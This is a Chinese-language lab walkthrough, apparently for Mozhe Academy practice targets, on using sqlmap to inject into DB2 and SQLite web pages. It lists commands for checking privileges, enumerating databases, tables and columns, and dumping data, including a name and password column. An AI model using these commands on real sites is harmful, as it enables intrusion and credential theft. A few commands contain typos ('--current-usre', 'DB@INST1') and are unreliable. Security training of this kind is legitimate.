一、注入DB2
http://124.70.71.251:49431/new_list.php?id=1
这是墨者学院里的靶机,地址:https://www.mozhe.cn/
1.1 测试数据库类型
python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1"
1.2 测试用户权限类型
查询选项
--is-dba 查看当前用户是否为管理员
--current-usre 查看当前用户的用户名
--privileges 查看当前用户的权限
python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --is-dba
查看当前用户的用户名
python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --current-usre
查看当前用户的权限
python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --privileges
1.3 查看库名
--dbs:获取系统中的所有库的名字
--current-db:获取当前库的名字
python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --dbs
python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" --current-db
1.4 查看表名
-D "库名" --tables
python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" -D "DB2INST1" --tables
1.5 查看字段名
-D "库名" -T "表名" --columns
python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" -D "DB@INST1" -T "NOTICE" --columns
1.6 查数据
-D "库名" -T "表名" --dump 查表中的全部数据
-D "库名" -T "表名" --dump -C "字段" 查表中指定字段中的数据
python sqlmap.py -u "http://124.70.71.251:49431/new_list.php?id=1" -D "DB2INST1" -T "NOTICE" -C "CONTENT" --dump
二、注入sqlite
测试地址:http://124.70.71.251:44648/new_list.php?id=1
2.1 测试数据库类型
清除缓存:--purge
python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" --purge
2.2 测试用户权限类型
查询选项
--is-dba 查看当前用户是否为管理员
--current-user 查看当前用户的用户名【sqlite不支持】
--privileges 查看当前用户的权限
python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" --is-dba
2.3 查看库名
--dbs:获取系统中的所有库的名字【sqlite不支持】
--current-db:获取当前库的名字【sqlite不支持】
2.4 查看表名
-D "库名" --tables 【sqlite不支持】
--tables【sqlite只能这样写】
python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" --tables
2.5 查看字段名
-T "表名" --columns
python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" -T "WSTMart_reg" --columns
2.6 查数据
-D "库名" -T "表名" --dump 查表中的全部数据
-D "库名" -T "表名" --dump -C "字段" 查看表中的指定字段中的数据
python sqlmap.py -u "http://124.70.71.251:44648/new_list.php?id=1" -T "WSTMart_reg" --dump -C "name,password"